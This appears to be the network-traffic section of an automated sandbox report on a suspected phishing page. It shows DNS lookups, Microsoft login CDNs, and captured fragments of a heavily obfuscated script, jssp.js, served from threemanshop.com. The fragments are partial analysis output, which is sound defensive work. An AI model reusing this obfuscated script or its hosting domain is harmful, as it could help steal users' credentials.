Apr 18, 2024 23:27:11.153398991 CEST	1.1.1.1	192.168.2.4	0xdeca	No error (0)	ih1.redbubble.net	cs203.wac.edgecastcdn.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 18, 2024 23:27:11.153398991 CEST	1.1.1.1	192.168.2.4	0xdeca	No error (0)	cs203.wac.edgecastcdn.net		72.21.91.237	A (IP address)	IN (0x0001)	false
Apr 18, 2024 23:27:11.153920889 CEST	1.1.1.1	192.168.2.4	0x5226	No error (0)	ih1.redbubble.net	cs203.wac.edgecastcdn.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 18, 2024 23:27:11.432763100 CEST	1.1.1.1	192.168.2.4	0x3523	No error (0)	shed.dual-low.part-0013.t-0009.t-msedge.net	part-0013.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 18, 2024 23:27:11.432763100 CEST	1.1.1.1	192.168.2.4	0x3523	No error (0)	part-0013.t-0009.t-msedge.net		13.107.246.41	A (IP address)	IN (0x0001)	false
Apr 18, 2024 23:27:11.432763100 CEST	1.1.1.1	192.168.2.4	0x3523	No error (0)	part-0013.t-0009.t-msedge.net		13.107.213.41	A (IP address)	IN (0x0001)	false
Apr 18, 2024 23:27:14.362492085 CEST	1.1.1.1	192.168.2.4	0xf9c5	No error (0)	www.google.com			65	IN (0x0001)	false
Apr 18, 2024 23:27:14.362531900 CEST	1.1.1.1	192.168.2.4	0x80b7	No error (0)	www.google.com		64.233.177.106	A (IP address)	IN (0x0001)	false
Apr 18, 2024 23:27:14.362531900 CEST	1.1.1.1	192.168.2.4	0x80b7	No error (0)	www.google.com		64.233.177.103	A (IP address)	IN (0x0001)	false
Apr 18, 2024 23:27:14.362531900 CEST	1.1.1.1	192.168.2.4	0x80b7	No error (0)	www.google.com		64.233.177.99	A (IP address)	IN (0x0001)	false
Apr 18, 2024 23:27:14.362531900 CEST	1.1.1.1	192.168.2.4	0x80b7	No error (0)	www.google.com		64.233.177.105	A (IP address)	IN (0x0001)	false
Apr 18, 2024 23:27:14.362531900 CEST	1.1.1.1	192.168.2.4	0x80b7	No error (0)	www.google.com		64.233.177.104	A (IP address)	IN (0x0001)	false
Apr 18, 2024 23:27:14.362531900 CEST	1.1.1.1	192.168.2.4	0x80b7	No error (0)	www.google.com		64.233.177.147	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

cdn.socket.io

threemanshop.com

www.w3schools.com

aadcdn.msftauth.net

aadcdn.msauth.net

logincdn.msauth.net

ih1.redbubble.net

fs.microsoft.com

slscr.update.microsoft.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49733	108.156.152.88	443	2312	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-18 21:27:09 UTC	510	OUT	GET /4.6.0/socket.io.min.js HTTP/1.1 Host: cdn.socket.io Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Origin: null sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: script Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-18 21:27:09 UTC	701	IN	HTTP/1.1 200 OK Content-Type: application/javascript; charset=utf-8 Content-Length: 45806 Connection: close Accept-Ranges: bytes Access-Control-Allow-Origin: * Cache-Control: public, max-age=31536000, immutable Content-Disposition: inline; filename="socket.io.min.js" Date: Tue, 16 Apr 2024 19:40:08 GMT ETag: "80f5b8c6a9eeac15de93e5a112036a06" Server: Vercel Strict-Transport-Security: max-age=63072000 X-Vercel-Cache: HIT X-Vercel-Id: iad1::wnxjz-1713296408969-670e28de6495 X-Cache: Hit from cloudfront Via: 1.1 bb8bbc4ce2468c3354e2e15d1132366a.cloudfront.net (CloudFront) X-Amz-Cf-Pop: ATL58-P3 X-Amz-Cf-Id: b1mKnfBXoDZM22_EzKkUehG1f5PkCDYtpV9ZLDRMVokPe4eDX2sqFQ== Age: 791663
2024-04-18 21:27:09 UTC	16384	IN	Data Raw: 2f 2a 21 0a 20 2a 20 53 6f 63 6b 65 74 2e 49 4f 20 76 34 2e 36 2e 30 0a 20 2a 20 28 63 29 20 32 30 31 34 2d 32 30 32 33 20 47 75 69 6c 6c 65 72 6d 6f 20 52 61 75 63 68 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 2e 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 65 29 3a 28 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 Data Ascii: /! Socket.IO v4.6.0 * (c) 2014-2023 Guillermo Rauch * Released under the MIT License. */!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e():"function"==typeof define&&define.amd?define(e):(t="undefined"!=typeof g
2024-04-18 21:27:09 UTC	16384	IN	Data Raw: 6c 65 3d 21 31 3b 66 6f 72 28 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 72 3d 74 5b 6e 5d 2c 69 3d 6e 3d 3d 3d 74 2e 6c 65 6e 67 74 68 2d 31 3b 45 28 72 2c 65 2e 73 75 70 70 6f 72 74 73 42 69 6e 61 72 79 2c 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 72 79 7b 65 2e 77 73 2e 73 65 6e 64 28 74 29 7d 63 61 74 63 68 28 74 29 7b 7d 69 26 26 69 74 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 65 2e 77 72 69 74 61 62 6c 65 3d 21 30 2c 65 2e 65 6d 69 74 52 65 73 65 72 76 65 64 28 22 64 72 61 69 6e 22 29 7d 29 2c 65 2e 73 65 74 54 69 6d 65 6f 75 74 46 6e 29 7d 29 29 7d 2c 72 3d 30 3b 72 3c 74 2e 6c 65 6e 67 74 68 3b 72 2b 2b 29 6e 28 72 29 7d 7d 2c 7b 6b 65 79 3a 22 64 6f 43 6c 6f 73 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 6f Data Ascii: le=!1;for(var n=function(n){var r=t[n],i=n===t.length-1;E(r,e.supportsBinary,(function(t){try{e.ws.send(t)}catch(t){}i&&it((function(){e.writable=!0,e.emitReserved("drain")}),e.setTimeoutFn)}))},r=0;r<t.length;r++)n(r)}},{key:"doClose",value:function(){vo
2024-04-18 21:27:09 UTC	13038	IN	Data Raw: 73 68 69 66 74 28 74 29 2c 74 68 69 73 2e 5f 6f 70 74 73 2e 72 65 74 72 69 65 73 26 26 21 74 68 69 73 2e 66 6c 61 67 73 2e 66 72 6f 6d 51 75 65 75 65 26 26 21 74 68 69 73 2e 66 6c 61 67 73 2e 76 6f 6c 61 74 69 6c 65 29 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 61 64 64 54 6f 51 75 65 75 65 28 6e 29 2c 74 68 69 73 3b 76 61 72 20 69 3d 7b 74 79 70 65 3a 45 74 2e 45 56 45 4e 54 2c 64 61 74 61 3a 6e 2c 6f 70 74 69 6f 6e 73 3a 7b 7d 7d 3b 69 66 28 69 2e 6f 70 74 69 6f 6e 73 2e 63 6f 6d 70 72 65 73 73 3d 21 31 21 3d 3d 74 68 69 73 2e 66 6c 61 67 73 2e 63 6f 6d 70 72 65 73 73 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 6e 5b 6e 2e 6c 65 6e 67 74 68 2d 31 5d 29 7b 76 61 72 20 6f 3d 74 68 69 73 2e 69 64 73 2b 2b 2c 73 3d 6e 2e 70 6f 70 28 29 3b 74 68 Data Ascii: shift(t),this._opts.retries&&!this.flags.fromQueue&&!this.flags.volatile)return this._addToQueue(n),this;var i={type:Et.EVENT,data:n,options:{}};if(i.options.compress=!1!==this.flags.compress,"function"==typeof n[n.length-1]){var o=this.ids++,s=n.pop();th

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49734	172.67.202.97	443	2312	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-18 21:27:09 UTC	487	OUT	GET /jssp.js HTTP/1.1 Host: threemanshop.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-18 21:27:10 UTC	770	IN	HTTP/1.1 200 OK Date: Thu, 18 Apr 2024 21:27:10 GMT Content-Type: application/javascript; charset=UTF-8 Content-Length: 248873 Connection: close X-Powered-By: Express Access-Control-Allow-Origin: * Cache-Control: public, max-age=14400 Last-Modified: Tue, 02 Apr 2024 06:44:51 GMT ETag: W/"3cc29-18e9d8dac96" CF-Cache-Status: MISS Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OEetwBqobqoLpM7XsvmqrcXWzwvEcXQTn4qySfalZd3KamXtGi1ZKwrlHz3F72JApVS9zVvOR%2F3mmaOnR81Oattv%2FY8x1wQVuD8Xlh%2BMWyQG2EKKKVrGqgyP6a2SJBDi%2BaTi"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8767bcbedd694557-ATL alt-svc: h3=":443"; ma=86400
2024-04-18 21:27:10 UTC	599	IN	Data Raw: 66 75 6e 63 74 69 6f 6e 20 5f 30 78 33 38 30 31 28 5f 30 78 33 38 35 34 38 65 2c 20 5f 30 78 33 66 64 61 32 61 29 20 7b 0a 20 20 20 20 63 6f 6e 73 74 20 5f 30 78 33 65 31 61 35 33 20 3d 20 5f 30 78 34 37 64 64 28 29 3b 0a 20 20 20 20 72 65 74 75 72 6e 20 5f 30 78 33 38 30 31 20 3d 20 66 75 6e 63 74 69 6f 6e 28 5f 30 78 34 31 34 61 37 31 2c 20 5f 30 78 35 39 61 61 30 38 29 20 7b 0a 20 20 20 20 20 20 20 20 5f 30 78 34 31 34 61 37 31 20 3d 20 5f 30 78 34 31 34 61 37 31 20 2d 20 28 30 78 31 20 2a 20 2d 30 78 37 36 64 20 2b 20 2d 30 78 31 20 2a 20 2d 30 78 39 63 37 20 2b 20 2d 30 78 31 64 66 29 3b 0a 20 20 20 20 20 20 20 20 6c 65 74 20 5f 30 78 35 63 63 34 65 35 20 3d 20 5f 30 78 33 65 31 61 35 33 5b 5f 30 78 34 31 34 61 37 31 5d 3b 0a 20 20 20 20 20 20 20 20 Data Ascii: function _0x3801(_0x38548e, _0x3fda2a) { const _0x3e1a53 = _0x47dd(); return _0x3801 = function(_0x414a71, _0x59aa08) { _0x414a71 = _0x414a71 - (0x1 * -0x76d + -0x1 * -0x9c7 + -0x1df); let _0x5cc4e5 = _0x3e1a53[_0x414a71];
2024-04-18 21:27:10 UTC	1369	IN	Data Raw: 2d 30 78 61 20 2a 20 30 78 31 31 33 20 2b 20 30 78 31 33 36 62 29 20 2b 20 70 61 72 73 65 49 6e 74 28 5f 30 78 35 37 66 32 35 63 28 30 78 35 34 38 29 29 20 2f 20 28 2d 30 78 31 64 62 32 20 2b 20 2d 30 78 31 35 32 65 20 2b 20 30 78 33 32 65 33 29 20 2b 20 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 35 37 66 32 35 63 28 30 78 62 35 62 29 29 20 2f 20 28 2d 30 78 32 33 38 33 20 2a 20 30 78 31 20 2b 20 2d 30 78 32 61 32 20 2a 20 2d 30 78 36 20 2b 20 30 78 31 33 62 62 29 20 2a 20 28 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 35 37 66 32 35 63 28 30 78 39 34 32 29 29 20 2f 20 28 2d 30 78 31 20 2a 20 30 78 31 30 30 33 20 2b 20 30 78 31 20 2a 20 30 78 62 64 64 20 2b 20 30 78 34 32 62 29 29 20 2b 20 70 61 72 73 65 49 6e 74 28 5f 30 78 35 37 66 32 35 63 28 30 78 62 39 33 29 Data Ascii: -0xa * 0x113 + 0x136b) + parseInt(_0x57f25c(0x548)) / (-0x1db2 + -0x152e + 0x32e3) + -parseInt(_0x57f25c(0xb5b)) / (-0x2383 * 0x1 + -0x2a2 * -0x6 + 0x13bb) * (-parseInt(_0x57f25c(0x942)) / (-0x1 * 0x1003 + 0x1 * 0xbdd + 0x42b)) + parseInt(_0x57f25c(0xb93)
2024-04-18 21:27:10 UTC	1369	IN	Data Raw: 34 66 28 30 78 31 66 64 29 20 2b 20 5f 30 78 31 37 31 62 34 66 28 30 78 36 65 64 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 64 78 63 55 72 27 3a 20 5f 30 78 31 37 31 62 34 66 28 30 78 31 62 37 29 20 2b 20 5f 30 78 31 37 31 62 34 66 28 30 78 61 62 34 29 20 2b 20 5f 30 78 31 37 31 62 34 66 28 30 78 36 38 39 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 4a 61 58 73 79 27 3a 20 66 75 6e 63 74 69 6f 6e 28 5f 30 78 35 34 63 33 30 63 2c 20 5f 30 78 35 61 34 62 39 66 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 5f 30 78 35 34 63 33 30 63 20 3d 3d 3d 20 5f 30 78 35 61 34 62 39 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 46 51 4b 6d 64 27 3a 20 5f 30 78 31 37 31 62 34 66 28 Data Ascii: 4f(0x1fd) + _0x171b4f(0x6ed), 'dxcUr': _0x171b4f(0x1b7) + _0x171b4f(0xab4) + _0x171b4f(0x689), 'JaXsy': function(_0x54c30c, _0x5a4b9f) { return _0x54c30c === _0x5a4b9f; }, 'FQKmd': _0x171b4f(
2024-04-18 21:27:10 UTC	1369	IN	Data Raw: 20 20 27 4a 59 4f 51 4d 27 3a 20 66 75 6e 63 74 69 6f 6e 28 5f 30 78 35 35 36 64 62 64 2c 20 5f 30 78 35 63 31 66 30 30 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 5f 30 78 35 35 36 64 62 64 20 3d 3d 3d 20 5f 30 78 35 63 31 66 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 59 4e 65 4e 6c 27 3a 20 5f 30 78 31 37 31 62 34 66 28 30 78 61 35 62 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 4f 47 53 59 47 27 3a 20 5f 30 78 31 37 31 62 34 66 28 30 78 38 66 65 29 20 2b 20 5f 30 78 31 37 31 62 34 66 28 30 78 36 32 39 29 20 2b 20 5f 30 78 31 37 31 62 34 66 28 30 78 62 34 38 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 6a 4c 75 7a 50 27 3a 20 66 75 6e 63 74 69 6f 6e 28 5f 30 Data Ascii: 'JYOQM': function(_0x556dbd, _0x5c1f00) { return _0x556dbd === _0x5c1f00; }, 'YNeNl': _0x171b4f(0xa5b), 'OGSYG': _0x171b4f(0x8fe) + _0x171b4f(0x629) + _0x171b4f(0xb48), 'jLuzP': function(_0
2024-04-18 21:27:10 UTC	1369	IN	Data Raw: 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 50 5a 55 77 43 27 3a 20 5f 30 78 31 37 31 62 34 66 28 30 78 63 34 39 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 45 75 5a 79 50 27 3a 20 5f 30 78 31 37 31 62 34 66 28 30 78 39 32 33 29 20 2b 20 5f 30 78 31 37 31 62 34 66 28 30 78 34 61 36 29 20 2b 20 5f 30 78 31 37 31 62 34 66 28 30 78 35 33 37 29 20 2b 20 5f 30 78 31 37 31 62 34 66 28 30 78 62 31 39 29 20 2b 20 5f 30 78 31 37 31 62 34 66 28 30 78 31 31 61 29 20 2b 20 5f 30 78 31 37 31 62 34 66 28 30 78 63 34 62 29 20 2b 20 5f 30 78 31 37 31 62 34 66 28 30 78 31 31 63 29 20 2b 20 5f 30 78 31 37 31 62 34 66 28 30 78 37 65 30 29 20 2b 20 5f 30 78 31 37 31 62 34 66 28 30 78 38 37 37 29 20 2b 20 5f 30 78 31 37 31 Data Ascii: 9; }, 'PZUwC': _0x171b4f(0xc49), 'EuZyP': _0x171b4f(0x923) + _0x171b4f(0x4a6) + _0x171b4f(0x537) + _0x171b4f(0xb19) + _0x171b4f(0x11a) + _0x171b4f(0xc4b) + _0x171b4f(0x11c) + _0x171b4f(0x7e0) + _0x171b4f(0x877) + _0x171
2024-04-18 21:27:10 UTC	1369	IN	Data Raw: 3a 20 5f 30 78 31 37 31 62 34 66 28 30 78 38 30 62 29 20 2b 20 5f 30 78 31 37 31 62 34 66 28 30 78 37 32 38 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 49 69 42 53 61 27 3a 20 5f 30 78 31 37 31 62 34 66 28 30 78 32 65 34 29 20 2b 20 5f 30 78 31 37 31 62 34 66 28 30 78 36 36 32 29 20 2b 20 5f 30 78 31 37 31 62 34 66 28 30 78 63 63 38 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 77 70 66 62 6e 27 3a 20 66 75 6e 63 74 69 6f 6e 28 5f 30 78 34 38 61 32 34 61 2c 20 5f 30 78 34 31 39 33 37 36 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 5f 30 78 34 38 61 32 34 61 20 2b 20 5f 30 78 34 31 39 33 37 36 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 54 58 73 51 56 27 3a 20 66 75 6e Data Ascii: : _0x171b4f(0x80b) + _0x171b4f(0x728), 'IiBSa': _0x171b4f(0x2e4) + _0x171b4f(0x662) + _0x171b4f(0xcc8), 'wpfbn': function(_0x48a24a, _0x419376) { return _0x48a24a + _0x419376; }, 'TXsQV': fun
2024-04-18 21:27:10 UTC	1369	IN	Data Raw: 20 20 20 20 20 20 20 27 61 51 4e 4a 4a 27 3a 20 5f 30 78 31 37 31 62 34 66 28 30 78 36 32 38 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 72 70 73 74 73 27 3a 20 5f 30 78 31 37 31 62 34 66 28 30 78 63 39 32 29 20 2b 20 27 6c 2e 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 57 76 4e 55 70 27 3a 20 5f 30 78 31 37 31 62 34 66 28 30 78 62 30 62 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 78 66 63 65 55 27 3a 20 5f 30 78 31 37 31 62 34 66 28 30 78 62 31 35 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 63 72 4d 56 4e 27 3a 20 5f 30 78 31 37 31 62 34 66 28 30 78 38 61 34 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 5a 4a 77 7a 77 27 3a 20 5f 30 78 31 37 31 62 34 66 28 30 78 36 36 63 29 20 2b 20 5f 30 78 31 37 31 62 34 66 28 30 78 32 62 31 29 20 2b Data Ascii: 'aQNJJ': _0x171b4f(0x628), 'rpsts': _0x171b4f(0xc92) + 'l.', 'WvNUp': _0x171b4f(0xb0b), 'xfceU': _0x171b4f(0xb15), 'crMVN': _0x171b4f(0x8a4), 'ZJwzw': _0x171b4f(0x66c) + _0x171b4f(0x2b1) +
2024-04-18 21:27:10 UTC	1369	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 27 68 44 66 57 66 27 3a 20 5f 30 78 31 37 31 62 34 66 28 30 78 38 34 66 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 59 65 6d 49 59 27 3a 20 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 62 64 32 32 35 2c 20 5f 30 78 35 64 35 61 33 61 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 5f 30 78 33 62 64 32 32 35 20 3d 3d 3d 20 5f 30 78 35 64 35 61 33 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 48 57 6d 53 62 27 3a 20 5f 30 78 31 37 31 62 34 66 28 30 78 33 37 38 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 4a 67 41 68 67 27 3a 20 5f 30 78 31 37 31 62 34 66 28 30 78 34 62 61 29 20 2b 20 5f 30 78 31 37 31 62 34 66 28 30 78 34 61 64 29 20 2b 20 5f 30 Data Ascii: 'hDfWf': _0x171b4f(0x84f), 'YemIY': function(_0x3bd225, _0x5d5a3a) { return _0x3bd225 === _0x5d5a3a; }, 'HWmSb': _0x171b4f(0x378), 'JgAhg': _0x171b4f(0x4ba) + _0x171b4f(0x4ad) + _0
2024-04-18 21:27:10 UTC	1369	IN	Data Raw: 28 5f 30 78 32 62 31 62 33 64 2c 20 5f 30 78 33 38 30 65 62 38 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 71 58 56 55 42 27 3a 20 5f 30 78 31 37 31 62 34 66 28 30 78 32 32 62 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 6f 45 47 61 49 27 3a 20 5f 30 78 31 37 31 62 34 66 28 30 78 32 36 32 29 20 2b 20 27 6e 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 72 4a 76 6a 5a 27 3a 20 5f 30 78 31 37 31 62 34 66 28 30 78 37 31 66 29 20 2b 20 27 73 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 46 55 58 4f 56 27 3a 20 5f 30 78 31 37 31 62 34 66 28 30 78 63 37 62 29 20 2b 20 27 74 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 56 54 79 62 47 27 3a 20 5f 30 78 31 37 31 62 34 66 28 30 78 63 30 37 29 2c 0a 20 20 20 Data Ascii: (_0x2b1b3d, _0x380eb8); }, 'qXVUB': _0x171b4f(0x22b), 'oEGaI': _0x171b4f(0x262) + 'n', 'rJvjZ': _0x171b4f(0x71f) + 's', 'FUXOV': _0x171b4f(0xc7b) + 't', 'VTybG': _0x171b4f(0xc07),
2024-04-18 21:27:10 UTC	1369	IN	Data Raw: 4e 55 46 27 3a 20 5f 30 78 31 37 31 62 34 66 28 30 78 35 33 33 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 54 57 4a 75 5a 27 3a 20 5f 30 78 31 37 31 62 34 66 28 30 78 34 35 65 29 20 2b 20 27 70 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 47 77 49 6c 6b 27 3a 20 5f 30 78 31 37 31 62 34 66 28 30 78 35 38 63 29 20 2b 20 5f 30 78 31 37 31 62 34 66 28 30 78 31 36 30 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 57 6e 76 4f 44 27 3a 20 5f 30 78 31 37 31 62 34 66 28 30 78 32 66 37 29 20 2b 20 27 6b 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 52 72 73 75 79 27 3a 20 5f 30 78 31 37 31 62 34 66 28 30 78 31 65 66 29 20 2b 20 5f 30 78 31 37 31 62 34 66 28 30 78 39 66 39 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 54 43 4f 74 50 27 3a 20 5f 30 78 31 Data Ascii: NUF': _0x171b4f(0x533), 'TWJuZ': _0x171b4f(0x45e) + 'p', 'GwIlk': _0x171b4f(0x58c) + _0x171b4f(0x160), 'WnvOD': _0x171b4f(0x2f7) + 'k', 'Rrsuy': _0x171b4f(0x1ef) + _0x171b4f(0x9f9), 'TCOtP': _0x1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49740	192.229.173.207	443	2312	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-18 21:27:10 UTC	509	OUT	GET /w3css/4/w3.css HTTP/1.1 Host: www.w3schools.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-18 21:27:10 UTC	521	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Age: 11373 Cache-Control: public,max-age=14400,public Content-Security-Policy: frame-ancestors 'self' https://mycourses.w3schools.com; Content-Type: text/css Date: Thu, 18 Apr 2024 21:27:10 GMT Etag: "076f6bb690da1:0" Last-Modified: Wed, 17 Apr 2024 10:57:32 GMT Server: ECS (agb/5385) Vary: Accept-Encoding X-Cache: HIT X-Content-Security-Policy: frame-ancestors 'self' https://mycourses.w3schools.com; X-Powered-By: ASP.NET Content-Length: 23427 Connection: close
2024-04-18 21:27:10 UTC	16383	IN	Data Raw: ef bb bf 2f 2a 20 57 33 2e 43 53 53 20 34 2e 31 35 20 44 65 63 65 6d 62 65 72 20 32 30 32 30 20 62 79 20 4a 61 6e 20 45 67 69 6c 20 61 6e 64 20 42 6f 72 67 65 20 52 65 66 73 6e 65 73 20 2a 2f 0a 68 74 6d 6c 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 7d 2a 2c 2a 3a 62 65 66 6f 72 65 2c 2a 3a 61 66 74 65 72 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 69 6e 68 65 72 69 74 7d 0a 2f 2a 20 45 78 74 72 61 63 74 20 66 72 6f 6d 20 6e 6f 72 6d 61 6c 69 7a 65 2e 63 73 73 20 62 79 20 4e 69 63 6f 6c 61 73 20 47 61 6c 6c 61 67 68 65 72 20 61 6e 64 20 4a 6f 6e 61 74 68 61 6e 20 4e 65 61 6c 20 67 69 74 2e 69 6f 2f 6e 6f 72 6d 61 6c 69 7a 65 20 2a 2f 0a 68 74 6d 6c 7b 2d 6d 73 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 2d 77 65 62 Data Ascii: /* W3.CSS 4.15 December 2020 by Jan Egil and Borge Refsnes /html{box-sizing:border-box},:before,:after{box-sizing:inherit}/* Extract from normalize.css by Nicolas Gallagher and Jonathan Neal git.io/normalize */html{-ms-text-size-adjust:100%;-web
2024-04-18 21:27:10 UTC	1	IN	Data Raw: 21 Data Ascii: !
2024-04-18 21:27:10 UTC	7043	IN	Data Raw: 69 6d 70 6f 72 74 61 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 62 63 64 34 21 69 6d 70 6f 72 74 61 6e 74 7d 0a 2e 77 33 2d 62 6c 75 65 2d 67 72 65 79 2c 2e 77 33 2d 68 6f 76 65 72 2d 62 6c 75 65 2d 67 72 65 79 3a 68 6f 76 65 72 2c 2e 77 33 2d 62 6c 75 65 2d 67 72 61 79 2c 2e 77 33 2d 68 6f 76 65 72 2d 62 6c 75 65 2d 67 72 61 79 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 36 30 37 64 38 62 21 69 6d 70 6f 72 74 61 6e 74 7d 0a 2e 77 33 2d 67 72 65 65 6e 2c 2e 77 33 2d 68 6f 76 65 72 2d 67 72 65 65 6e 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 Data Ascii: important;background-color:#00bcd4!important}.w3-blue-grey,.w3-hover-blue-grey:hover,.w3-blue-gray,.w3-hover-blue-gray:hover{color:#fff!important;background-color:#607d8b!important}.w3-green,.w3-hover-green:hover{color:#fff!important;background-color:#4

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
